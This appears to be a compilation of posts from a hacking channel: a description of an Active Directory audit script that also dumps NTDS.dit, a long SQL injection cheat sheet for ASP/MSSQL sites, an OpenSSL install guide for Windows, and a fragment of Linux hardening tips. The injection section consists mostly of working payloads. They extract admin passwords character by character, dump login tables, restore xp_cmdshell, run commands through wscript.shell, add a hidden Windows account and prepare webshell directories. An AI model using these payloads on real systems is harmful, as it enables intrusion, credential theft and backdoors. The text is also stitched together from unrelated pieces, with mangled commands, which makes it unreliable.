▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Adaudit - Powershell script to automate domain auditing:

F E AT U R E S :

What does he do ?

Device Information
Get-HostDetails
Domain audit
Get-MachineAccountQuota
Get-SMB1Support
Get-FunctionalLevel
Get-DCsNotOwnedByDA
Domain trust audit
Get-DomainTrusts
User Account Audit
Get-InactiveAccounts
Get-DisabledAccounts
Get-AdminAccountChecks
Get-NULLSessions
Get-AdminSDHolders
Get-ProtectedUsers
Auditing password information
Get-AccountPassDontExpire
Get-UserPasswordNotChangedRecently
Get-PasswordPolicy
Dumps NTDS.dit
Get-NTDSdit
Object audit
Get-OldBoxes
GPO audit (and checking SYSVOL passwords)
Get-GPOtoFile
Get-GPOsPerOU
Get-SYSVOLXMLS
Check general rights of AD group
Get-OUPerms
Check for LAPS on the domain
Get-LAPSStatus
Check for policies and authentication stores
Get-AuthenticationPoliciesAndSilos
Launch arguments
The following flags can be used in combination with running a script

-hostdetails retrieves the hostname and other useful audit information
-domainaudit retrieves AD information such as functional level
-trusts retrieves information about any trust relationship with the domain
-accounts identifies account problems such as expired, disabled, etc ...
-passwordpolicy returns password policy information
-ntds outputs the NTDS.dit file using ntdsutil
-oldbox identifies legacy OSs like XP / 2003 joined to a domain
-gpo outputs GPOs in XML and HTML for later analysis
-uperms checks for common OU permissions issues
-laps checks if LAPS is installed
-authpolsilos checks for the existence of policies and authentication stores
-all runs all checks, e.g. AdAudit.ps1 -all


DOWNLOAD:
https://github.com/phillips321/adaudit

Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑FOR EXPERTS ASP+PHP standard SQL injection statement:

1) Determine whether there is an injection point
'; and 1=1 and 1=2

2) Guess the name of the general table is nothing more than admin adminuser user pass password etc...
and 0<>(select count(*) from *)
and 0<>(select count(*) from admin) --- judge whether The admin table exists

3) Guess the number of accounts. If you encounter 0<return to the correct page 1<return to the error page, the number of accounts is 1
and 0<(select count(*) from admin)
and 1<(select count(*) from admin)

4) Guess the field name and add the field name we think of in the len() brackets.
and 1=(select count(*) from admin where len(*)>0)--
and 1=(select count(*) from admin where len(user field name)>0)
and 1=(select count(*) from admin where len(password field name password)>0)

5) Guess the length of each field. Guess the length is to change> 0 until the correct page is returned.

and 1=(select count(*) from admin where len(*)>0)
and 1=(select count(*) from admin where len(name)>6)
and 1=(select count(*) from admin where len(name)>5)
and 1=(select count(*) from admin where len(name)=6)

and 1=(select count(*) from admin where len(password)>11)
and 1=(select count(*) from admin where len(password)>12)
and 1=(select count(*) from admin where len(password)=12)


🦑Guess the character

6) and 1=(select count(*) from admin where left(name,1)='a')
and 1=(select count(*) from admin where left(name,2)='ab')-
Just add one character at a time and guess like this. If you guess how many digits you just guessed, it's correct, and the account number is calculated.

and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) --
This query sentence can guess the user and password in Chinese. Just change the number after it to the ASSIC code in Chinese and it is OK. Finally, the result is converted into characters.
'group by users.id having 1=1--
'group by users.id, users.username, users.password, users.privs having 1=1--
'; insert into users values( 666, 'attacker', 'foobar', 0xffff )--

UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable'-
UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable' WHERE COLUMN_NAME NOT IN ('login_id')-
UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable' WHERE COLUMN_NAME NOT IN ('login_id','login_name')-
UNION SELECT TOP 1 login_name FROM logintable-
UNION SELECT TOP 1 password FROM logintable where login_name='Rahul'--

7) Look at the server patch = something went wrong and SP4 patch was applied

and 1=(select @@VERSION)--
Look at the permissions of the database connection account and return to normal, which proves to be the server role sysadmin permissions.
and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'))--

8) Determine the connection database account. (Using the SA account to connect and return to normal = prove that the connected account is SA)

and 'sa'=(SELECT System_user)--
and user_name()='dbo'--
and 0<>(select user_name()--
See if xp_cmdshell is deleted


and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = 'X' AND name = 'xp_cmdshell')--
xp_cmdshell is deleted, restored, supports absolute path restoration
;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll'--
;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','c:\inetpub\wwwroot\xplog70.dll'--

9) Reverse PING own experiment

;use master;declare @s int;exec sp_oacreate "wscript.shell",@s out;exec sp_oamethod @s,"run",NULL,"cmd.exe /c ping 192.168.0.1";--

10) Add account


;DECLARE @shell INT EXEC SP_OACREATE 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add'--
Create a virtual directory E:

;declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL,' cscript.exe c：\inetpub\wwwroot\mkwebdir.vbs -w "默认Web站点" -v "e","e：\"'--
Access attributes: (cooperate with writing a webshell)

11) declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL,' cscript.exe c：\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse'
Explosive library Special skills: %5c='\' or submit / and \ modify %5
and 0<>(select top 1 paths from newtable)--

12) Get the library name (from 1 to 5 are the system id, 6 or more can be judged)
and 1=(select name from master.dbo.sysdatabases where dbid=7)--
and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)
Submit dbid = 7, 8, 9.... to get more database names

and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U') admin
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U' and name not in ('Admin')) 来得到其他的表。
and 0<>(select count(*) from bbs.dbo.sysobjects where xtype='U' and name='admin'
and uid>(str(id))) UID18779569 uid=id
and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569) admin一user_id
and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569 and name not in
('id',...)
and 0<(select user_id from BBS.dbo.admin where username>1) 可
You can get the password in turn. . . . . Suppose there are fields such as user_id username and password

and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U')
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U' and name not in('Address'))
and 0<>(select count(*) from bbs.dbo.sysobjects where xtype='U' and name='admin' and uid>(str(id)))
and 0<>(select top 1 name from BBS.dbo.syscolumns where id=773577794)
?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin
?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin (union，access)

13)Get the WEB path
;create table [dbo].[swap] ([swappass][char](255));--
and (select top 1 swappass from swap)=1--
;CREATE TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test varchar(20) exec master..xp_regread @rootkey='HKEY_LOCAL_MACHINE', @key='SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\', @value_name='/', values=@test OUTPUT insert into paths(path) values(@test)--
;use ku1;--
;create table cmd (str image);-- image—cmd


Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑FOR EXPERTS ASP+PHP standard SQL injection statement:

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 How to install the most recent version of OpenSSL on Windows 10 :

Take OpenSSL for example.

This open source cryptographic library that implements the Transport Layer Security (TLS) and Secure Sockets Layer (SSL) protocols is designed to “protect communications over computer networks from eavesdropping,” but guess what?

2) From the very beginning, it was riddled with mistakes.

This can be inevitable, to a certain extent - after all, we're talking about software.

While there is nothing you can do about bugs that have yet to be identified, you can at least protect your systems from bugs that are already fixed and documented.

It's a shame that the official OpenSSL site only offers Linux source.

While Linux distributions usually ship with OpenSSL, this does not apply to Windows ... or, say, "Windows distributions".

If you want to run it, you need a Windows binary, and if you don't want to build it yourself, you must find another option.

1) Step 1. Download the binary
Finding OpenSSL binaries for Windows is no easy task, but don't despair.

They exist.

2) To download the required one, follow the link:

https://slproweb.com/products/Win32OpenSSL.html

Don't be fooled by either the Win32 string in the URL or the navigation pointing to a seemingly ancient download page from back in 2004.

3) Scroll down to the Download Win32 OpenSSL section.

Now you need to select the correct file from this list.

4) There are two main types for each version: light and full.

5) Download a file called "Win64 OpenSSL v1.1.0f" (or a newer version as soon as it becomes available) to download the full installer.

6) Step 2. Run the installer
We recommend installing OpenSSL outside of your Windows system directory.

Follow the GUI installation instructions.

7) Step 3. Run the OpenSSL binary
To get started with OpenSSL, you can simply right click on it in Windows Explorer at its installation location, like in my case:

C: \ OpenSSL-Win64 \ bin \
then select "Run as administrator".

8) You can now start generating OpenSSL keys. (By the way, users of the PuTTY remote access utility can export the OpenSSH key from PuTTYgen.)

9) When using OpenSSL on Windows this way, you simply skip the openssl command you see at the prompt.
For example, to create a key pair using OpenSSL on Windows, you can enter:

10) openssl req -newkey rsa: 2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem
and follow the onscreen instructions as usual.

11) To view the certificate:
openssl x509 -text -noout -in certificate.pem
Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

For example, create a new udev configuration file named 80-readonly-usb.rules in the /etc/udev/rules.d/ directory with the following content:

SUBSYSTEM == "block", ATTRS {removable} == "1", RUN {program} = "/ sbin / blockdev --setro% N"
Then apply the rule with the following command:

# udevadm control -reload

12) Disable TTY root access
To prevent the root account from logging in through all console devices (TTY), delete the contents of the securetty file by typing the following command at a command prompt as root.

# cp / etc / securetty /etc/securetty.bak
# cat / dev / null> / etc / securetty
Remember this rule does not apply to SSH login

To prevent logging in via SSH, edit the / etc / ssh / sshd_config file and add the following line:

PermitRootLogin no

13) Use POSIX ACL to extend system rights
Access Control Lists (ACLs) can define access rights for more than one user or group, and can define rights for programs, processes, files, and directories.

If you set an ACL for a directory, its child directories will automatically inherit the same rights.

For instance:

# setfacl -mu: user: rw file
# getfacl file


Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 How to install the most recent version of OpenSSL on Windows 10 ?